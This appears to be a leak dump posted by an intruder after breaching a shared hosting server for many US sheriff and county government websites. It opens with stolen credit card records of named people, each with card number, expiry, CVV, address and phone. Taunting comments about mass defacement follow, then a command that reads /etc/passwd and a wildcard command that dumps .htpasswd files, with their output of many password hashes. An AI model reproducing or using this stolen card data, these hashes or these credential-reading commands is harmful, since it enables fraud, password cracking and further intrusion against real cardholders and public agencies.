Stolen Credit Card information from mosheriffs.com online store: Jeremy,Searcy,jeremy@pfimo.com,417-887-3626,MasterCard,5191000109460087,2,2014, 102,3526 W Nichols,,Springfield,MO,65803 Robert,Zoellr,Cabot46@aol.com,954-529-0840,Visa,4388540016715210,11,2012,501,401 E Las Olas Blvd ,Suite 130-143,FT Lauderdale ,FL,33301,571 Elbow Cay Drive,Camden,Osage Beach,MO,65065 Jeffrey,Thomas,chymoda3@aol.com,573-529-1836,MasterCard,5109820390825461,2,2013, 768,417 North Locust Street,,Richland,MO,65556 nathan,vails,dalebud2004@sbcglobal.net,573-225-3010,Visa,4607174190144503,7,2013 ,237,35984 Hwy 25,,malden,MO,63863 David,Yingling,dyingling@sbcglobal.net,573-335-5286,MasterCard,5200011252796077, 5,2014,739,617 Peironnet Drive,,Cape Girardeau,MO,63701 Mark,Bell,Mark@jailbaitcyclesandrods.com,417 830 3410,MasterCard,5441840150712888,5,2012,094,8117 West Farm Road 168,,Republic,MO,65738 // DAMN THATS A LOT OF DOMAINS... TOO BAD ZONE-H MASS DEFACEMENT NOTIFICATION // FORM ONLY ALLOWS YOU TO SUBMIT 10 PER REQUEST... GONNA TAKE FOREVER $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin webdept:x:500:500::/home/webdept:/bin/bash avahi:x:70:70:Avahi daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin sw-cp-server:x:501:501::/:/bin/true psaadm:x:502:502:Plesk user:/usr/local/psa/admin:/sbin/nologin popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin psaftp:x:503:504:anonftp psa user:/:/sbin/nologin alias:x:2021:2020:Qmail User:/var/qmail/alias:/sbin/nologin qmaild:x:2020:2020:Qmail User:/var/qmail/:/sbin/nologin qmaill:x:2022:2020:Qmail User:/var/qmail/:/sbin/nologin qmailp:x:2023:2020:Qmail User:/var/qmail/:/sbin/nologin qmailq:x:2520:2520:Qmail User:/var/qmail/:/sbin/nologin qmailr:x:2521:2520:Qmail User:/var/qmail/:/sbin/nologin qmails:x:2522:2520:Qmail User:/var/qmail/:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash drweb:x:101:2523:DrWeb system account:/var/drweb:/bin/false jdpa:x:10001:2522::/var/www/vhosts/20jdpa.com:/bin/false barms:x:10002:2522::/var/www/vhosts/barrycountysheriff.com:/bin/false bcsd:x:10003:2522::/var/www/vhosts/baxtercountysheriff.com:/bin/bash bjm:x:10004:2522::/var/www/vhosts/mostwantedwebsites.net:/bin/false demo:x:10005:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/demo:/bin/ false dymin:x:10006:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/dymin:/bin /false dcsd:x:10007:2522::/var/www/vhosts/drewcountysheriff.com:/bin/false bocg:x:10008:2522::/var/www/vhosts/boonecountyar.com:/bin/false crcsd:x:10009:2522::/var/www/vhosts/crosscountysheriff.org:/bin/false bocs:x:10010:2522::/var/www/vhosts/boonesheriff.com:/bin/false izhth:x:10011:2522::/var/www/vhosts/izardhometownhealth.com:/bin/false mcmtn:x:10012:2522::/var/www/vhosts/mcminncountysheriff.com:/bin/false ccsal:x:10013:2522::/var/www/vhosts/cherokeecountyalsheriff.com:/bin/false tunms:x:10014:2522::/var/www/vhosts/tunicamssheriff.com:/bin/false ccsd:x:10015:2522::/var/www/vhosts/cleburnecountysheriff.com:/bin/false ciwy:x:10016:2522::/var/www/vhosts/cityofwynne.com:/bin/false ncsd:x:10017:2522::/var/www/vhosts/newtoncountysheriff.org:/bin/false icsd:x:10019:2522::/var/www/vhosts/izardcountysheriff.org:/bin/false shsd:x:10020:2522::/var/www/vhosts/sharpcountysheriff.com:/bin/false polms:x:10021:2522::/var/www/vhosts/polkcountymosheriff.org:/bin/false grcg:x:10023:2522::/var/www/vhosts/grantcountyar.com:/bin/false lawmo:x:10024:2522::/var/www/vhosts/lawrencecosheriff.com:/bin/false johms:x:10025:2522::/var/www/vhosts/jocomosheriff.org:/bin/false sacsd:x:10026:2522::/var/www/vhosts/scsosheriff.org:/bin/false jcsd:x:10027:2522::/var/www/vhosts/jacksonsheriff.org:/bin/false gcsd:x:10028:2522::/var/www/vhosts/grantcountysheriff-collector.com:/bin/false izcg:x:10029:2522::/var/www/vhosts/izardcountyar.org:/bin/false jocsd:x:10030:2522::/var/www/vhosts/johnsoncosheriff.com:/bin/false scsd:x:10031:2522::/var/www/vhosts/sebastiancountysheriff.com:/bin/false bjm2:x:10032:2522::/var/www/vhosts/mostwantedgovernmentwebsites.com:/bin/false test:x:10033:10033::/home/test:/bin/bash bcsd_sync:x:10034:10034::/var/www/vhosts/baxtercountysheriff.com/home:/bin/bash ccsal_synce:x:10035:10035::/home/ccsal_synce:/bin/bash ccsal_sync:x:10036:10036::/var/www/vhosts/cherokeecountyalsheriff.com/home:/bin/ bash kluser:x:10037:10037:Kaspersky AntiVirus scanner user:/var/db/kav:/sbin/nologin tigeraccessftp:x:10038:10038::/var/www/vhosts/crosscountysheriff.org/home:/bin/ bash vbcsd:x:10039:2522::/var/www/vhosts/vbcso.com:/bin/false jonms2:x:10040:2522::/var/www/vhosts/jonesso.com:/bin/false ccsoks:x:10041:2522::/var/www/vhosts/cherokeecountykssheriff.com:/bin/false crcg:x:10042:2522::/var/www/vhosts/crosscountyar.org:/bin/false tcsoms:x:10043:2522::/var/www/vhosts/tatecountysheriff.com:/bin/false hcsoks:x:10018:2522::/var/www/vhosts/hodgemansheriff.us:/bin/false jcsoks:x:10044:2522::/var/www/vhosts/jeffersoncountykssheriff.com:/bin/false mosa:x:10045:2522::/var/www/vhosts/mosheriffs.com:/bin/false pcsoks:x:10046:2522::/var/www/vhosts/prattcountysheriff.com:/bin/false johms_sync:x:10047:10047::/var/www/vhosts/jocomosheriff.org/home:/bin/bash hcsar:x:10022:2522::/var/www/vhosts/howardcountysheriffar.com:/bin/false hscar:x:10048:2522::/var/www/vhosts/hotspringcountysheriff.com:/bin/false pcsoia:x:10049:2522::/var/www/vhosts/plymouthcountysheriff.com:/bin/false mcsd:x:10050:2522::/var/www/vhosts/marioncountysheriffar.com:/bin/false wsoks:x:10051:2522::/var/www/vhosts/woodsonsheriff.com:/bin/false mosa2010:x:10052:10052::/var/www/vhosts/mosheriffs.com/httpdocs/academy/ file_manager:/bin/bash faoret:x:10053:2522::/var/www/vhosts/faoret.com:/bin/false bcso_tiger:x:10054:2522::/var/www/vhosts/boonesheriff.com/home:/bin/false stcsd:x:10055:2522::/var/www/vhosts/stonecountysheriff.com:/bin/false ccsoms:x:10056:2522::/var/www/vhosts/coahomacountysheriff.com:/bin/false kcsoms:x:10057:2522::/var/www/vhosts/kempercountysheriff.com:/bin/false pcsoks_sync:x:10058:10058::/var/www/vhosts/prattcountysheriff.com/home:/bin/ false mocsd:x:10059:2522::/var/www/vhosts/monroecountysheriffar.com:/bin/false postfix:x:89:89::/var/spool/postfix:/sbin/nologin bcsoga:x:10060:2522::/var/www/vhosts/bakercountysheriffoffice.org:/bin/false jonms_sync:x:10061:10061::/var/www/vhosts/jonesso.com/home:/bin/bash jcsoks_sync:x:10062:10062::/var/www/vhosts/jeffersoncountykssheriff.com/home:/ bin/bash cpsola:x:10063:2522::/var/www/vhosts/cameronso.org:/bin/false cgsomo:x:10064:2522::/var/www/vhosts/capecountysheriff.org:/bin/false sfsoar:x:10065:2522::/var/www/vhosts/stfranciscountysheriff.org:/bin/false sfsoar_sync:x:10066:10066::/var/www/vhosts/stfranciscountysheriff.org/home:/bin/ bash code:x:10067:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/code:/bin/ false fcsoga:x:10068:2522::/var/www/vhosts/floydcountysheriff.org:/bin/false mcsoga:x:10069:2522::/var/www/vhosts/meriwethercountysheriff.org:/bin/false code2:x:10070:2522::/var/www/vhosts/admin.mostwantedwebsites.net:/bin/false kcsoil:x:10071:2522::/var/www/vhosts/knoxcountysheriffil.com:/bin/false mcsoal:x:10072:2522::/var/www/vhosts/marionsoal.com:/bin/false sgsomo:x:10073:2522::/var/www/vhosts/sgcso.com:/bin/false gcsoms:x:10074:2522::/var/www/vhosts/georgecountymssheriff.com:/bin/false stoms:x:10075:2522::/var/www/vhosts/stonecountymosheriff.com:/bin/false hcsar_sync:x:10076:10076::/var/www/vhosts/howardcountysheriffar.com/home/:/bin/ bash alsa:x:10077:2522::/var/www/vhosts/alabamasheriffs.com:/bin/false pcsoar:x:10078:2522::/var/www/vhosts/perrycountysheriffar.org:/bin/false rcsd:x:10079:2522::/var/www/vhosts/randolphcountysheriff.org:/bin/false tisoms:x:10081:2522::/var/www/vhosts/tishomingocountysheriff.com:/bin/false stoms_sync:x:10082:10082::/var/www/vhosts/stonecountymosheriff.com/home:/usr/ libexec/openssh/sftp-server prsoar:x:10083:2522::/var/www/vhosts/prairiecountysheriff.org:/bin/false mcsd_sync:x:10084:10084::/var/www/vhosts/marioncountysheriffar.com/home/xmlapp:/ bin/bash jccgms:x:10086:2522::/var/www/vhosts/jeffersoncountyms.gov:/bin/false ccsook:x:10087:2522::/var/www/vhosts/sheriffcomanche.com:/bin/false fcsoar:x:10088:2522::/var/www/vhosts/fultoncountyso.org:/bin/false poalac:x:10085:2522::/var/www/vhosts/poalac.org:/bin/false arsa:x:10091:2522::/var/www/vhosts/arkansassheriffsassociation.com:/bin/false rcpica:x:10080:2522::/var/www/vhosts/rcpi-ca.org:/bin/false ciga:x:10092:2522::/var/www/vhosts/cityofgassville.org:/bin/false sfcgar:x:10093:2522::/var/www/vhosts/stfranciscountyar.org:/bin/false lcsomo:x:10094:2522::/var/www/vhosts/lcsdmo.com:/bin/false tcsoal:x:10095:2522::/var/www/vhosts/talladegasheriff.org:/bin/false jwiegand:x:10096:10096::/home/jwiegand:/bin/bash bcsf:x:10097:2522::/var/www/vhosts/baxtercountysherifffoundation.org:/bin/false prsoms:x:10089:2522::/var/www/vhosts/prentisscountymssheriff.com:/bin/false acsoms:x:10098:2522::/var/www/vhosts/adamscosheriff.org:/bin/false kssa:x:10099:2522::/var/www/vhosts/kansassheriffs.org:/bin/false // CAT'N HUNDREDS OF .HTPASSWD FILES IN ONE COMMAND LIKE A BOSS $ cat /var/www/vhosts/*/pd/* 2010user:$1$YfJPNAST$w9rRAaYhAMjpkw.GRLUD90 jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0 jdpa:$1$uBEldfcW$mzSY61wj97PN41JWNPcA9/ jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0 acsoms:$1$/OuADgxB$l7pPU2kXeKlw7Iz9NLGID. acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1 acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1 code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60 code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60 alsa:$1$gg9rFhvF$S41htlhsl3AJYZu4dKWR50 alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO. alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO. arsa:$1$uKT57hqw$3KrrKngKKD.J8nFMYq0nf/ arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1 arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ. arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1 arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ. bcsoga:$1$wD0B3RJw$F/kRNzUrqyAsXGEZUUt7t. bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K.. bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K.. barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv. barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91 barms:$1$2bdOu.yt$HfX7Ziq4mwgqQxFCBlnNq0 barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv. barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91 bcsd:$1$.wyutJHS$fI7mFoV8F0txtXS3yCYxr. bcsd:$1$8HNY0AzH$FLIStjcXdzSLFnVcWOs7/1 bcsf:$1$/xEB/mNM$5JyBevwhGqzByNokDINVe/ bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/ bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/ bocg:$1$d04I8Pzb$W0qBTons8Dmm2Jw9We3xB/ bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0 bocg:$1$GvD5EuF.$RZ/I71SmN2YCppnS3KtbT0 bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0 bocs:$1$oZB0olYk$/qQ.rLe8/yBnA5lT4HDga1 bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0 bocs:$1$qsQEjN0k$8UNgs23OwLrA73XUXxSCa. bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0 cpsola:$1$A0/je.pN$ZGoDb3fmCJdQ1qUB6aRhk1 cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90 cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90 cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1 cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW. cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1 cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW. ccsal:$1$nqrzKwH1$1SUCJG3Ge1jLbd6a4pd.61 ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0 ccsal:$1$IexvBxv4$d.exkq9idTn05wW6smXSF1 ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0 ccsoks:$1$KKczisBp$d1rBOCK8iRkjmBZhv.YXp. ccsoks:$1$BbttpHqg$TzMxb1f40QefP8kSIEpJn/ ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71 ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0 ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71 ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0 ciwy:$1$/DFbGKuZ$NNH1VE8TXfaBhuJHDca2x1 ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi. ciwy:$1$9olIl6Nc$ycMPhxfVWGJ5Ka5ZLlEtK0 ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi. ccsd:$1$IT4RKfjK$um0Ty6wMJ8O7kIIbIJqRD1 ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t. ccsd:$1$SORBbPS1$MPxim.kDNpNeuwwAE2Ugb0 ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t. ccsoms:$1$PGQZTZay$8g.aw5516ifzB9pfGUdZX. ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1 ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1 crcg:$1$ygtelVAp$E9V85e3doWLLyyCMCv2KB1 crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4. crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4. crcsd:$1$r7WoQcbv$fR4knFo1YqBYUb91ES7/K. crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5. crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5. dcsd:$1$/3GteTce$sYf4e6A7O0ais2J1EyTMz. dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1 dcsd:$1$BBBW.zd2$G4ZJegTfHreCJXwojwA8P0 dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1 fcsoga:$1$oC0dNlM6$GfFCuZ2N2UnKMI9MZWbwb1 fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0 fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0 fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0 fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0 gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/ gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0 gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/ gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0 grcg:$1$Ivu4aPQu$weOoXmrm8jtNOUrFTS3vf. grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1 grcg:$1$HPX7vhZO$LWzATw3fluPOYFYnDd3I61 grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1 gcsd:$1$T7O8tM.l$AUYTc4uhY7aYuhVfHNW/9/ gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/ gcsd:$1$07x6ii.Y$K33yOQCuMu9juWBU0.tw31 gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/ hcsoks:$1$3qklJZQ5$ERPeSxH1DtuX2pis0ah0q0 hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1 hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1 hscar:$1$gJJLpsPa$lQkGfO6sT0TM/p/ACmieM0 hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/ hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/ hcsar:$1$Jy4Wo5AA$dgDDznszPUBYPmuM7eBj9. hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1 hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0 hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1 hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0 izcg:$1$SzRnGt.T$085pTzlcqWgJv7DguG6dv1 izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/ izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/ icsd:$1$XwGJZ7Ia$sj99HKjkzILx6qGDiWmHy. icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0 icsd:$1$vo3ZSlXF$DTLKCc/7z6IFgvbFtvCAT1 icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0 izhth:$1$mrQmTDHz$Nr02zDwC5m7NxplWZWW0O/ izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1 izhth:$1$IbDSXX4O$sFVTpg5ts1EagLkzoNZQ30 izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1 jcsd:$1$ZkEh5MIb$v3l1z3PQZ5yyG5ABzWef2/ jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0 jcsd:$1$HgNpXLdQ$KPP62pOHPjl7XslEBTqGH/ jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0 jcsoks:$1$Z/D6TvAM$JGvIns6wx.RCPwv0C51TJ/ jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ. jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ. jccgms:$1$aHstkoLz$tOpRH9HwTGLjSF7YZRiuo. jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR. jccgms:$1$xi9Cf0im$4vC24C1vlcoteo1aDEFJW. jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR. johms:$1$fmryjChe$CwJyPptiu0Iwcai2LUTPu0 johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1 johms:$1$nykSrZ50$0yH62S8FZq3NOczux2cjC/ johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1 jocsd:$1$s63jViKP$gaT9byX/ySNJDMkA5.PCd. jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1 jocsd:$1$u.mk/ipa$.WSRBIK6MvsWHcfTMt//I/ jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1 jonms:$1$fLjLWKCb$UDgyy9UzkwyiJC7AWtD40/ jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0 jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS. jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0 jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS. kssa:$1$YlbQvrcd$ruaMsfYDwhVlH1k/LGlIJ. kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/ kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/ kcsoms:$1$goZMALd1$JnxVQ9J603tEsthqkadvE. kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1 kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1 kcsoil:$1$4XOK98tG$kjOUaIN3ZNZepl3aCHijc. kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0 kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0 lawmo:$1$MezHiiqn$OoLtNNLAm20gBBvW0BtOB0 lawmo:$1$h11BRv3g$wA.ITq8U0Cq4N4ZHoDVmC0 lawmo:$1$5jjY0Omy$eWZkfvCtF0tLdyDv9fmnC0 lcsomo:$1$I/cdxg/g$Pn2tTJK776Si9phzUfNzT1 lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe. lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe. mcsd:$1$NZpwhOoE$4zeC8H.PhoyVjsBhB4VFb1 mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0 mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0 mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0 mcsoal:$1$1/1E1eTW$epzJFtOGo/Me/eeo.6Dg// mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0 mcsoal:$1$OPKYzsqo$WmTHzrV/WlbZPH4JWKQ41. mcmtn:$1$dJKz4stC$wxWzTBkC76Mox8yv5i8z9/ mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj. mcmtn:$1$AGtoxXro$zlQV8/C674RTOhMwp9Pqf1 mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj. mcsoga:$1$p2oL7Pi5$LusOSWnvUHofJ0iAvhvEr0 mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0 mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0 mocsd:$1$1bJZUS9v$9cPKxA8hiX1bKbCz6Js1i1 mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/ mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/ mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0 mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy. mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0 mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy. CityPass:$1$pJ75xXss$N1LTh9EwM.aKAeZBjdp7N/ PerryCounty:$1$T6K61l6D$05/rRhPd6fDPqVuJUQKfF/ bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60 bjm:$1$bXLmD2bt$4Rk5jfA2x8UcJ7W4Tw35s0 bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60 bjm:$1$Sx95fGzg$6ASZ4J6kjziYIDH6xQcki1 2010user:$1$vFJrv2A6$K82FAw89ZvDc1pvHdLhA21 bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0 bjm:$1$Ds5nOfeW$snloc4PMymDdgG5ld6wjw/ bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0 ncsd:$1$3Ocas0HS$Wg2AZygMmPne.rCxh4n9Y0 ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1 ncsd:$1$bSp.iYg8$cr1ZzEYuBTVU.vCPhC6sw/ ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1 pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0 pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0 pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0 pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0 pcsoia:$1$e3ASKnqy$ps9LSniLjC3kOkGaGn5YM0 pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50 pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50 poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj. poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1 poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj. poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1 polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0 polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy. polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0 polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy. prsoar:$1$2jmIGv7j$0zSfngOL9UeBLq/zsuFGg1 prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0 prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0 pcsoks:$1$84DZ5jUv$22478RXYSJ83Yon/VbXoq0 pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr. pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr. prsoms:$1$Nfacesfq$cwqZNxlFjJo8N/RrOodIY1 prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS. prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS. rcsd:$1$aM0/EhqP$HPTN/wX2L0ErPIsaYADow1 rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11 rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11 rcpica:$1$6FIHrPeK$mspB9nNY4YNy/.9brKRlP. rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1 rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1 sacsd:$1$ZLGR289Y$KevSJOo0PezTAqatJUouK. sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1 sacsd:$1$dIxeOzw5$SdsN7F6iYxyryZLodaDHC0 sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1 scsd:$1$aRIkZHPq$dYZwP7SrhhumFy6QVTNr1/ scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0 scsd:$1$L05Gndoq$V8OevuZqUMK//gsBOPmxq1 scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0 sgsomo:$1$kFw.79HG$KMcvV/zhzzB2PUzy0860N. sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0 